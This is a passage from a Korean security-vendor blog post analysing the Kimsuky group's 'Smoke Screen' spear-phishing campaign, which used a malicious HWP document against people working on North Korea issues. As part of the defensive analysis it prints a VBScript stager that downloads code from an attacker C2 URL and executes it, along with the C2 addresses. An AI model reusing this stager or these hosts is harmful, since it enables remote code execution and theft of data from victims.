12pt;">앞서 살펴본 사례와 같이 지난 05월 01일에는 미국의 싱크탱크 연구원이 보낸 것처럼 위장한 위협으로 미국에서 보고되었습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">그리고 05월 02일 한국에서는 '안보정세-북·러 정상회담 결과보고.hwp' 파일명으로 대북관련 한국인 종사자에게 공격이 수행됐습니다.</span></p><p><br /></p><p><br /></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 542px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/99DB2A405CD92BC62F" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99DB2A405CD92BC62F" width="542" height="270" filename="09.png" filemime="image/jpeg"/></span></p><p style="text-align: center; clear: none; float: none;"><span style="font-size: 12pt;">[그림 9] 공격 이메일 화면</span></p><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">한국과 미국의 시차를 고려해 봤을 때 거의 같은 시기에 '스모크 스크린' 캠페인이</span><span style="font-size: 12pt;"> 활발히 수행됐</span><span style="font-size: 12pt;">다는 점을 예측해 볼 수 있습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">한국을 공격할 때 사용한 악성 HWP 문서 파일도 DOC 문서 때와 동일하게 암호 설정 기능이 적용되어 있습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">따라서 암호를 알지 못하면, 보안 제품이 조기 대응하는데 제한이 발생할 수 있으며, </span><span style="font-size: 12pt;">이번 공격</span><span style="font-size: 12pt;">에는 흥미롭게도 이메일 본문에도 별도의 암호가 존재하지 않았습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">ESRC는 공격에 사용된 코드를 추적하는 과정에서 암호가 설정되지 않은 사례를 확보해 분석을 진행했습니다.</span></p><p><br /></p><p><br /></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 693px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/993C8F395CD92BE230" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F993C8F395CD92BE230" width="693" height="369" filename="10.png" filemime="image/jpeg"/></span></p><p style="text-align: center; clear: none; float: none;"><span style="font-size: 12pt;">[그림 10] HWP 내부 구조에 포함된 악성 포스트 스크립트 화면</span></p><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">포스트 스크립트에 존재하는 쉘코드를 분석하면 'first.hta' 코드를 통해 명령을 수행하게 됩니다.</span><br /></p><p><br /></p><p><span style="font-size: 12pt;">- http://a2khs.mireene.co.kr/plugin/sms5/skin/basic/nodejs/first[.]hta</span></p><p><br /></p><p><br /></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 446px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/99B3433F5CD91EA409" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99B3433F5CD91EA409" width="446" height="343" filename="11.png" filemime="image/jpeg"/></span></p><p style="text-align: center;"><span style="font-size: 12pt;">[그림 11] 쉘코드를 통한 C2 통신 화면</span><br /></p><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">'first.hta' 코드에는 다음과 같이 'expres.php' 명령을 수행하게 됩니다.</span></p><p><br /></p><p><br /></p><div class="txc-textbox" style="border-style: dashed; border-width: 1px; border-color: rgb(203, 203, 203); background-color: rgb(255, 255, 255); padding: 10px;"><p><span style="font-size: 12pt;"><script language="VBScript"></span></p><p><span style="white-space: pre; font-size: 12pt;"> </span><span style="font-size: 12pt;">On Error Resume Next:</span></p><p><span style="white-space: pre; font-size: 12pt;"> </span></p><p><span style="white-space: pre; font-size: 12pt;"> </span><span style="font-size: 12pt;">Set Post0 = CreateObject("MSXML2.ServerXMLHTTP.6.0"):</span></p><p><span style="white-space: pre; font-size: 12pt;"> </span><span style="font-size: 12pt;">Post0.open "GET", "http://a2khs.mireene.co.kr/plugin/sms5/skin/basic/nodejs/expres[</span><span style="font-size: 12pt;">.]php?op=1", False:</span></p><p><span style="white-space: pre; font-size: 12pt;"> </span><span style="font-size: 12pt;">Post0.Send:</span></p><p><span style="white-space: pre; font-size: 12pt;"> </span><span style="font-size: 12pt;">t0=Post0.responseText:</span></p><p><span style="white-space: pre; font-size: 12pt;"> </span><span style="font-size: 12pt;">Execute(t0)</span></p></div><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">이 공격 패턴은 기존 '스모크 스크린'과 일맥상통하고 있어 별도의 내용은 생략하도록 하겠습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">최종적으로 'keylogger1.ps1' 파워쉘 명령을 통해 감염된 컴퓨터 정보를 수집하게 되며, </span><span style="font-size: 12pt;">명령이 수행하는 과정에 화면에는 다음과 같은 정상 문서 내용을 보여주게 됩니다.</span></p><p><br /></p><p><br /></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 670px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/99BBB23A5CD92C002B" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99BBB23A5CD92C002B" width="670" height="568" filename="12.png" filemime="image/jpeg"/></span></p><p style="text-align: center; clear: none; float: none;"><span style="font-size: 12pt;">[그림 12] HWP 악성 문서가 실행된 후 보여지는 화면</span></p><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">악성 HWP </span><span style="font-size: 12pt;">파일에 남겨졌던 공격자 계정은 'Tom' 에서 'faeofua' 으로 변경된 특징이 있습니다.</span></p><p><br /></p><p><br /></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 514px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/99CB074A5CD9263232" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99CB074A5CD9263232" width="514" height="144" filename="13.png" filemime="image/jpeg"/></span></p><p style="text-align: center;"><span style="font-size: 12pt;">[그림 13] 문서별 메타 데이터 화면</span><br /></p><p><br /></p><p><br /></p><div class="txc-textbox" style="border-style: solid; border-width: 1px; border-color: rgb(231, 253, 181); background-color: rgb(231, 253, 181); padding: 10px;"><p><span style="font-size: 14pt;"><b><span style="color: rgb(0, 0, 0);">■ 마무리</span></b></span></p></div><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">ESRC는 '스모크 스크린' 캠페인의 배후에 정부 후원을 받고 있는 위협 그룹이 있다고 확신하고 있습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">이들은 수년간 한국의 주요 기관 및 기업을 대상으로 APT 공격을 수행하고 있을 뿐만 아니라, 미국내 북한분야 </span><span style="font-size: 12pt;">연구 조직에 대한 공격도 수행하는 등 갈수록 대담해지고 있습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">국가 차원의 사이버 첩보전이 치열해지고 있는 상황에서, 공격 그룹</span><span style="font-size: 12pt;">에 대한 다양한 정보 수집과 인텔리전스 협력</span><span style="font-size: 12pt;">을 통해 보다 신속한 대응안이 필요합니다</span><span style="font-size: 12pt;">.</span></p><p><br /></p><p><span style="font-size: 12pt;">유사 위협에 사용된 도구와 침해지표(IoC) 등을 '</span><a href="https://www.threatinside.com" target="_blank" class="tx-link"><span style="font-size: 12pt;">쓰렛 인사이드(Threat Inside)</span></a><span style="font-size: 12pt;">' 위협 인텔리전스 리포트를 통해 별도로 제공할 예정입니다.</span></p><p><br /></p><p><span style="font-size: 12pt;"> </span></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 400px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/99E4A64F5CD8B3B904" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99E4A64F5CD8B3B904" width="400" height="150" filename="이스트시큐리티 홈페이지_2_400x150.png" filemime="image/jpeg"/></span></p><p><br /></p><p><br /></p></div> <!-- System - START --> <!-- System - END --> <div class="container_postbtn #post_button_group"> <div class="postbtn_like"><script>window.ReactionButtonType = 'reaction'; window.ReactionApiUrl = '//blog.alyac.co.kr/reaction'; window.ReactionReqBody = { entryId: 2299 }</script> <div class="wrap_btn" id="reaction-2299" data-tistory-react-app="Reaction"></div><div class="wrap_btn wrap_btn_share"><button type="button" class="btn_post sns_btn btn_share" aria-expanded="false" data-thumbnail-url="https://img1.daumcdn.net/thumb/R800x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99122D365CD9FCC925" data-title="암호화된 APT 공격, Kimsuky 조직의 '스모크 스크린' PART 2" data-description="안녕하세요? 이스트시큐리티 시큐리티 대응센터(이하 ESRC) 입니다. 지난 04월 17일 "한ㆍ미 겨냥 APT 캠페인 '스모크 스크린' Kimsuky 실체 공개" 리포팅을 통해 한국과 미국을 대상으로 은밀하게 수행 중인 APT 공격의 배후가 드러난 바 있습니다. 약 한달이 지난 지금까지도 '스모크 스크린' 캠페인을 벌인 조직의 대남, 대미 사이버 첩보 활동이 멈추지 않고 있습니다. 흥미로운 점은 이들이 한국과 미국을 상대로 스피어 피싱(Spear Phishing) 공격을 수행하면서, 보안 탐지 시스템을 간단하게 우회하고 있다는 것입니다. ■ 보안 기밀 문서로 위장한 연막(스모크 스크린) 작전 배경 ESRC는 한국과 미국의 북한관련 분야에 종사하는 전문직만 겨냥한 이들의 활동을 관찰하고 분석하면서 공통적인.." data-profile-image="https://tistory1.daumcdn.net/tistory/1638807/attach/66ef962337cb4e999613553627d55396" data-profile-name="알약(Alyac)" data-pc-url="https://blog.alyac.co.kr/2299" data-relative-pc-url="/2299" data-blog-title="이스트시큐리티 알약 블로그"><span class="ico_postbtn ico_share">공유하기</span></button> <div class="layer_post" id="tistorySnsLayer"></div> </div><div class="wrap_btn wrap_btn_etc" data-entry-id="2299" data-entry-visibility="public" data-category-visibility="public"><button type="button" class="btn_post btn_etc2" aria-expanded="false"><span class="ico_postbtn ico_etc">게시글 관리</span></button> <div class="layer_post" id="tistoryEtcLayer"></div> </div></div> <button type="button" class="btn_menu_toolbar btn_subscription #subscribe" data-blog-id="1638807" data-url="https://blog.alyac.co.kr/2299" data-device="web_pc" data-tiara-action-name="구독 버튼_클릭"><em class="txt_state"></em><strong class="txt_tool_id">이스트시큐리티 알약 블로그</strong><span class="img_common_tistory ico_check_type1"></span></button><div class="postbtn_ccl" data-ccl-type="2" data-ccl-derive="1"> <a href="https://creativecommons.org/licenses/by/4.0/deed.ko" target="_blank" class="link_ccl" rel="license"> <span class="bundle_ccl"> <span class="ico_postbtn ico_ccl1">저작자표시</span> </span> </a> </div> <!-- <rdf:RDF xmlns="https://web.resource.org/cc/" xmlns:dc="https://purl.org/dc/elements/1.1/" xmlns:rdf="https://www.w3.org/1999/02/22-rdf-syntax-ns#"> <Work rdf:about=""> <license rdf:resource="https://creativecommons.org/licenses/by/4.0/deed.ko" /> </Work> <License rdf:about="https://creativecommons.org/licenses/by/4.0/deed.ko"> <permits rdf:resource="https://web.resource.org/cc/Reproduction"/> <permits rdf:resource="https://web.resource.org/cc/Distribution"/> <requires rdf:resource="https://web.resource.org/cc/Notice"/> <requires rdf:resource="https://web.resource.org/cc/Attribution"/> <permits rdf:resource="https://web.resource.org/cc/DerivativeWorks"/> </License> </rdf:RDF> --> <div data-tistory-react-app="SupportButton"></div> </div> <!-- PostListinCategory - START --> <div class="another_category another_category_color_gray"> <h4>'<a href="/category/%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8">악성코드 분석 리포트</a>' 카테고리의 다른 글</h4> <table> <tr> <th><a href="/2306">[주의] 신종 랜섬웨어 'Sodinokibi', 입사지원서 사칭해 유포 중!</a> <span>(1)</span></th> <td>2019.05.15</td> </tr> <tr> <th><a href="/2302">[주의] 신종 랜섬웨어 ‘Sodinokibi’, 견적 의뢰 요청 메일로 대량 유포 중!</a> <span>(0)</span></th> <td>2019.05.14</td> </tr> <tr> <th><a href="/2301">사용자 PC 정보를 탈취하는 국내 중소기업 사칭 견적 요청 피싱 메일 주의!</a> <span>(0)</span></th> <td>2019.05.13</td> </tr> <tr> <th><a href="/2294">TA505조직, 또다시 엑셀 문서로 위장한 악성 이메일 유포해</a> <span>(0)</span></th> <td>2019.05.08</td> </tr> <tr> <th><a href="/2292">리플라이 오퍼레이터 그룹 FAX 문서를 사칭한 악성 메일 유포중!</a> <span>(0)</span></th> <td>2019.05.08</td> </tr> </table> </div> <!-- PostListinCategory - END --> </div> </div> <!-- //본문 --> <!-- 태그 --> <div class="box_tag_trail"> <h2 class="tit_box">태그</h2> <div class="tag_cont"><a href="/tag/173.248.170.149" rel="tag">173.248.170.149</a>, <a href="/tag/a2khs.mireene.co.kr" rel="tag">a2khs.mireene.co.kr</a>, <a href="/tag/bit-albania.com" rel="tag">bit-albania.com</a>, <a href="/tag/cow.gif" rel="tag">cow.gif</a>, <a href="/tag/EGIS" rel="tag">EGIS</a>, <a href="/tag/exe.gif" rel="tag">exe.gif</a>, <a href="/tag/expres.php" rel="tag">expres.php</a>, <a href="/tag/first.hta" rel="tag">first.hta</a>, <a href="/tag/keylogger1.ps1" rel="tag">keylogger1.ps1</a>, <a href="/tag/Kimsuky" rel="tag">Kimsuky</a>, <a href="/tag/windowsmb" rel="tag">windowsmb</a>, <a href="/tag/%EC%8A%A4%EB%AA%A8%ED%81%AC%20%EC%8A%A4%ED%81%AC%EB%A6%B0" rel="tag">스모크 스크린</a>, <a href="/tag/%EC%93%B0%EB%A0%9B%20%EC%9D%B8%EC%82%AC%EC%9D%B4%EB%93%9C%28Threat%20Inside%29" rel="tag">쓰렛 인사이드(Threat Inside)</a>, <a href="/tag/%EC%95%88%EB%B3%B4%EC%A0%95%EC%84%B8-%EB%B6%81%C2%B7%EB%9F%AC%20%EC%A0%95%EC%83%81%ED%9A%8C%EB%8B%B4%20%EA%B2%B0%EA%B3%BC%EB%B3%B4%EA%B3%A0.hwp" rel="tag">안보정세-북·러 정상회담 결과보고.hwp</a></div> </div> <!-- //태그 --> <!-- 관련 글 --> <div class="box_related_article"> <h3 class="tit_box">관련글 <a href="/category/%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8" class="link_related">더보기</a></h3> <ul class="list_article list_sub list_related"> <li> <a href="/2306?category=957259" class="link_thumb thumb_type"> <div class="box_thumb thumb_img" style="background-image:url('https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9945AF3D5CDBA3322A')"></div> <div class="box_thumb no_img"> <div class="default_img"> <span class="box_svg"> <svg width="402" height="40" viewBox="0 0 402 40" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11.6085 38.7388C8.6497 38.7485 5.80179 37.6035 3.66035 35.5433C1.51891 33.4831 0.249801 30.7724 0.118425 27.7898C-0.0426807 22.2245 -0.0362364 16.8877 0.118425 10.8071C0.273086 5.01339 5.54446 0.00650245 11.37 0H48.1175V7.75092H7.74777V15.4945H48.1469V23.2433H7.76711V30.9911H48.1469V38.7388C48.1469 38.7388 14.5673 38.7292 11.6085 38.7388Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M99.8923 0V7.74777L61.9729 7.75847V15.5062L74.1766 15.4999V15.4961L81.3733 15.4961L82.4397 15.4955V15.496C83.3227 15.4957 84.0598 15.494 84.9039 15.4921C86.2155 15.489 87.7854 15.4854 90.5623 15.4854C93.6335 15.4378 96.6572 16.7314 98.8624 18.8761C101.068 21.0209 102.333 23.9565 102.381 27.0372C102.428 30.1179 101.253 33.0913 99.1153 35.3033C96.9771 37.5153 94.0589 38.6811 90.9877 38.7287L56.4473 38.7394V30.9916L94.6434 30.9809V23.2332L82.4397 23.2396V23.2433L75.2412 23.2433L74.1766 23.2439V23.2434C73.2936 23.2437 72.5565 23.2454 71.7124 23.2474C70.4008 23.2504 68.8309 23.254 66.054 23.254C62.9828 23.3016 59.9592 22.008 57.7539 19.8633C55.5487 17.7185 54.2832 14.7829 54.2358 11.7022C54.1883 8.62153 55.3629 5.64812 57.501 3.4361C59.6392 1.22408 62.5574 0.0582854 65.6286 0.0107075L99.8923 0Z" fill="#AEAEAE"/> <path d="M127.563 38.8772V7.74777H107.641V0L155.788 0V7.74777H135.865V38.8772H127.563Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M370.781 11.5547H376.897L385.393 22.7928L393.847 11.5547H400.004L388.028 27.2273V38.5035H382.636V27.2691L370.781 11.5547Z" fill="#AEAEAE"/> <path d="M368.103 16.9475H356.773V38.5073H351.369V16.9475H340.062V11.5547H368.103V16.9475Z" fill="#AEAEAE"/> <path d="M335.545 38.5073H330.156V11.5547H335.545V38.5073Z" fill="#AEAEAE"/> <path d="M323.853 38.5073H318.574V30.2888H300.612V38.5073H295.234V11.5547H318.487C320.01 11.679 321.421 12.4026 322.411 13.5665C323.37 14.7155 323.879 16.174 323.841 17.6701V23.0857C323.838 24.1214 323.566 25.1385 323.05 26.0369C322.521 26.9278 321.738 27.6413 320.803 28.0868C321.739 28.5474 322.52 29.2719 323.05 30.1709C323.575 31.0653 323.825 32.0943 323.769 33.1297L323.853 38.5073ZM318.574 24.8998V16.9475H300.612V24.8998H318.574Z" fill="#AEAEAE"/> <path d="M289.175 30.4675C289.182 32.5177 288.401 34.4922 286.992 35.982C285.579 37.4884 283.642 38.3961 281.58 38.5187H269.57C265.611 38.4122 262.223 34.6737 262.219 30.6348V11.5547H267.608V33.1297H283.779V11.5547H289.164L289.175 30.4675Z" fill="#AEAEAE"/> <path d="M237.141 38.5073C235.107 38.5148 233.149 37.7306 231.683 36.3205C230.21 34.9113 229.34 32.9871 229.253 30.9505C229.143 26.9496 229.147 22.9069 229.253 18.9441C229.36 14.9813 232.976 11.5623 236.977 11.5547H256.111V16.9475H234.562V33.1297H256.111V38.5187L237.141 38.5073Z" fill="#AEAEAE"/> <path d="M204.122 38.5035C202.093 38.5093 200.142 37.7265 198.68 36.3205C197.211 34.9068 196.343 32.9829 196.253 30.9467C196.143 26.9458 196.147 22.9031 196.253 18.9441C196.36 14.9851 199.969 11.5585 203.958 11.5547H223.126V16.9437H201.562V22.3327H223.126V27.7255H201.562V33.1145H223.126V38.5035H204.122Z" fill="#AEAEAE"/> <path d="M163.153 38.4806V33.1031H186.055V27.6989H169.919C167.897 27.7442 165.936 27.0086 164.442 25.6452C162.951 24.2166 162.048 22.2823 161.909 20.222C161.771 18.1517 162.401 16.1033 163.678 14.4679C164.947 12.88 166.776 11.8377 168.789 11.5547C168.926 11.5547 169.067 11.5547 169.2 11.5547H190.117V16.9209H167.298V22.3099H183.294C184.344 22.3062 185.385 22.5107 186.355 22.9115C187.326 23.3123 188.208 23.9015 188.949 24.645C190.473 26.2047 191.339 28.2908 191.368 30.4713C191.384 31.5009 191.193 32.5231 190.808 33.478C190.422 34.4328 189.85 35.301 189.124 36.0314C188.4 36.7895 187.533 37.3964 186.573 37.8168C185.612 38.2372 184.578 38.4629 183.53 38.4806H163.153Z" fill="#AEAEAE"/> </svg> </span> </div> </div> <div class="cont_thumb"> <p class="txt_thumb">[주의] 신종 랜섬웨어 'Sodinokibi', 입사지원서 사칭해 유포 중!</p> <p class="thumb_info"> <span class="date">2019.05.15</span> </p> </div> </a> </li> <li> <a href="/2302?category=957259" class="link_thumb thumb_type"> <div class="box_thumb thumb_img" style="background-image:url('https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9939654E5CDA3DC30F')"></div> <div class="box_thumb no_img"> <div class="default_img"> <span class="box_svg"> <svg width="402" height="40" viewBox="0 0 402 40" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11.6085 38.7388C8.6497 38.7485 5.80179 37.6035 3.66035 35.5433C1.51891 33.4831 0.249801 30.7724 0.118425 27.7898C-0.0426807 22.2245 -0.0362364 16.8877 0.118425 10.8071C0.273086 5.01339 5.54446 0.00650245 11.37 0H48.1175V7.75092H7.74777V15.4945H48.1469V23.2433H7.76711V30.9911H48.1469V38.7388C48.1469 38.7388 14.5673 38.7292 11.6085 38.7388Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M99.8923 0V7.74777L61.9729 7.75847V15.5062L74.1766 15.4999V15.4961L81.3733 15.4961L82.4397 15.4955V15.496C83.3227 15.4957 84.0598 15.494 84.9039 15.4921C86.2155 15.489 87.7854 15.4854 90.5623 15.4854C93.6335 15.4378 96.6572 16.7314 98.8624 18.8761C101.068 21.0209 102.333 23.9565 102.381 27.0372C102.428 30.1179 101.253 33.0913 99.1153 35.3033C96.9771 37.5153 94.0589 38.6811 90.9877 38.7287L56.4473 38.7394V30.9916L94.6434 30.9809V23.2332L82.4397 23.2396V23.2433L75.2412 23.2433L74.1766 23.2439V23.2434C73.2936 23.2437 72.5565 23.2454 71.7124 23.2474C70.4008 23.2504 68.8309 23.254 66.054 23.254C62.9828 23.3016 59.9592 22.008 57.7539 19.8633C55.5487 17.7185 54.2832 14.7829 54.2358 11.7022C54.1883 8.62153 55.3629 5.64812 57.501 3.4361C59.6392 1.22408 62.5574 0.0582854 65.6286 0.0107075L99.8923 0Z" fill="#AEAEAE"/> <path d="M127.563 38.8772V7.74777H107.641V0L155.788 0V7.74777H135.865V38.8772H127.563Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M370.781 11.5547H376.897L385.393 22.7928L393.847 11.5547H400.004L388.028 27.2273V38.5035H382.636V27.2691L370.781 11.5547Z" fill="#AEAEAE"/> <path d="M368.103 16.9475H356.773V38.5073H351.369V16.9475H340.062V11.5547H368.103V16.9475Z" fill="#AEAEAE"/> <path d="M335.545 38.5073H330.156V11.5547H335.545V38.5073Z" fill="#AEAEAE"/> <path d="M323.853 38.5073H318.574V30.2888H300.612V38.5073H295.234V11.5547H318.487C320.01 11.679 321.421 12.4026 322.411 13.5665C323.37 14.7155 323.879 16.174 323.841 17.6701V23.0857C323.838 24.1214 323.566 25.1385 323.05 26.0369C322.521 26.9278 321.738 27.6413 320.803 28.0868C321.739 28.5474 322.52 29.2719 323.05 30.1709C323.575 31.0653 323.825 32.0943 323.769 33.1297L323.853 38.5073ZM318.574 24.8998V16.9475H300.612V24.8998H318.574Z" fill="#AEAEAE"/> <path d="M289.175 30.4675C289.182 32.5177 288.401 34.4922 286.992 35.982C285.579 37.4884 283.642 38.3961 281.58 38.5187H269.57C265.611 38.4122 262.223 34.6737 262.219 30.6348V11.5547H267.608V33.1297H283.779V11.5547H289.164L289.175 30.4675Z" fill="#AEAEAE"/> <path d="M237.141 38.5073C235.107 38.5148 233.149 37.7306 231.683 36.3205C230.21 34.9113 229.34 32.9871 229.253 30.9505C229.143 26.9496 229.147 22.9069 229.253 18.9441C229.36 14.9813 232.976 11.5623 236.977 11.5547H256.111V16.9475H234.562V33.1297H256.111V38.5187L237.141 38.5073Z" fill="#AEAEAE"/> <path d="M204.122 38.5035C202.093 38.5093 200.142 37.7265 198.68 36.3205C197.211 34.9068 196.343 32.9829 196.253 30.9467C196.143 26.9458 196.147 22.9031 196.253 18.9441C196.36 14.9851 199.969 11.5585 203.958 11.5547H223.126V16.9437H201.562V22.3327H223.126V27.7255H201.562V33.1145H223.126V38.5035H204.122Z" fill="#AEAEAE"/> <path d="M163.153 38.4806V33.1031H186.055V27.6989H169.919C167.897 27.7442 165.936 27.0086 164.442 25.6452C162.951 24.2166 162.048 22.2823 161.909 20.222C161.771 18.1517 162.401 16.1033 163.678 14.4679C164.947 12.88 166.776 11.8377 168.789 11.5547C168.926 11.5547 169.067 11.5547 169.2 11.5547H190.117V16.9209H167.298V22.3099H183.294C184.344 22.3062 185.385 22.5107 186.355 22.9115C187.326 23.3123 188.208 23.9015 188.949 24.645C190.473 26.2047 191.339 28.2908 191.368 30.4713C191.384 31.5009 191.193 32.5231 190.808 33.478C190.422 34.4328 189.85 35.301 189.124 36.0314C188.4 36.7895 187.533 37.3964 186.573 37.8168C185.612 38.2372 184.578 38.4629 183.53 38.4806H163.153Z" fill="#AEAEAE"/> </svg> </span> </div> </div> <div class="cont_thumb"> <p class="txt_thumb">[주의] 신종 랜섬웨어 ‘Sodinokibi’, 견적 의뢰 요청 메일로 대량 유포 중!</p> <p class="thumb_info"> <span class="date">2019.05.14</span> </p> </div> </a> </li> <li> <a href="/2301?category=957259" class="link_thumb thumb_type"> <div class="box_thumb thumb_img" style="background-image:url('https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9957924C5CD907DF03')"></div> <div class="box_thumb no_img"> <div class="default_img"> <span class="box_svg"> <svg width="402" height="40" viewBox="0 0 402 40" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11.6085 38.7388C8.6497 38.7485 5.80179 37.6035 3.66035 35.5433C1.51891 33.4831 0.249801 30.7724 0.118425 27.7898C-0.0426807 22.2245 -0.0362364 16.8877 0.118425 10.8071C0.273086 5.01339 5.54446 0.00650245 11.37 0H48.1175V7.75092H7.74777V15.4945H48.1469V23.2433H7.76711V30.9911H48.1469V38.7388C48.1469 38.7388 14.5673 38.7292 11.6085 38.7388Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M99.8923 0V7.74777L61.9729 7.75847V15.5062L74.1766 15.4999V15.4961L81.3733 15.4961L82.4397 15.4955V15.496C83.3227 15.4957 84.0598 15.494 84.9039 15.4921C86.2155 15.489 87.7854 15.4854 90.5623 15.4854C93.6335 15.4378 96.6572 16.7314 98.8624 18.8761C101.068 21.0209 102.333 23.9565 102.381 27.0372C102.428 30.1179 101.253 33.0913 99.1153 35.3033C96.9771 37.5153 94.0589 38.6811 90.9877 38.7287L56.4473 38.7394V30.9916L94.6434 30.9809V23.2332L82.4397 23.2396V23.2433L75.2412 23.2433L74.1766 23.2439V23.2434C73.2936 23.2437 72.5565 23.2454 71.7124 23.2474C70.4008 23.2504 68.8309 23.254 66.054 23.254C62.9828 23.3016 59.9592 22.008 57.7539 19.8633C55.5487 17.7185 54.2832 14.7829 54.2358 11.7022C54.1883 8.62153 55.3629 5.64812 57.501 3.4361C59.6392 1.22408 62.5574 0.0582854 65.6286 0.0107075L99.8923 0Z" fill="#AEAEAE"/> <path d="M127.563 38.8772V7.74777H107.641V0L155.788 0V7.74777H135.865V38.8772H127.563Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M370.781 11.5547H376.897L385.393 22.7928L393.847 11.5547H400.004L388.028 27.2273V38.5035H382.636V27.2691L370.781 11.5547Z" fill="#AEAEAE"/> <path d="M368.103 16.9475H356.773V38.5073H351.369V16.9475H340.062V11.5547H368.103V16.9475Z" fill="#AEAEAE"/> <path d="M335.545 38.5073H330.156V11.5547H335.545V38.5073Z" fill="#AEAEAE"/> <path d="M323.853 38.5073H318.574V30.2888H300.612V38.5073H295.234V11.5547H318.487C320.01 11.679 321.421 12.4026 322.411 13.5665C323.37 14.7155 323.879 16.174 323.841 17.6701V23.0857C323.838 24.1214 323.566 25.1385 323.05 26.0369C322.521 26.9278 321.738 27.6413 320.803 28.0868C321.739 28.5474 322.52 29.2719 323.05 30.1709C323.575 31.0653 323.825 32.0943 323.769 33.1297L323.853 38.5073ZM318.574 24.8998V16.9475H300.612V24.8998H318.574Z" fill="#AEAEAE"/> <path d="M289.175 30.4675C289.182 32.5177 288.401 34.4922 286.992 35.982C285.579 37.4884 283.642 38.3961 281.58 38.5187H269.57C265.611 38.4122 262.223 34.6737 262.219 30.6348V11.5547H267.608V33.1297H283.779V11.5547H289.164L289.175 30.4675Z" fill="#AEAEAE"/> <path d="M237.141 38.5073C235.107 38.5148 233.149 37.7306 231.683 36.3205C230.21 34.9113 229.34 32.9871 229.253 30.9505C229.143 26.9496 229.147 22.9069 229.253 18.9441C229.36 14.9813 232.976 11.5623 236.977 11.5547H256.111V16.9475H234.562V33.1297H256.111V38.5187L237.141 38.5073Z" fill="#AEAEAE"/> <path d="M204.122 38.5035C202.093 38.5093 200.142 37.7265 198.68 36.3205C197.211 34.9068 196.343 32.9829 196.253 30.9467C196.143 26.9458 196.147 22.9031 196.253 18.9441C196.36 14.9851 199.969 11.5585 203.958 11.5547H223.126V16.9437H201.562V22.3327H223.126V27.7255H201.562V33.1145H223.126V38.5035H204.122Z" fill="#AEAEAE"/> <path d="M163.153 38.4806V33.1031H186.055V27.6989H169.919C167.897 27.7442 165.936 27.0086 164.442 25.6452C162.951 24.2166 162.048 22.2823 161.909 20.222C161.771 18.1517 162.401 16.1033 163.678 14.4679C164.947 12.88 166.776 11.8377 168.789 11.5547C168.926 11.5547 169.067 11.5547 169.2 11.5547H190.117V16.9209H167.298V22.3099H183.294C184.344 22.3062 185.385 22.5107 186.355 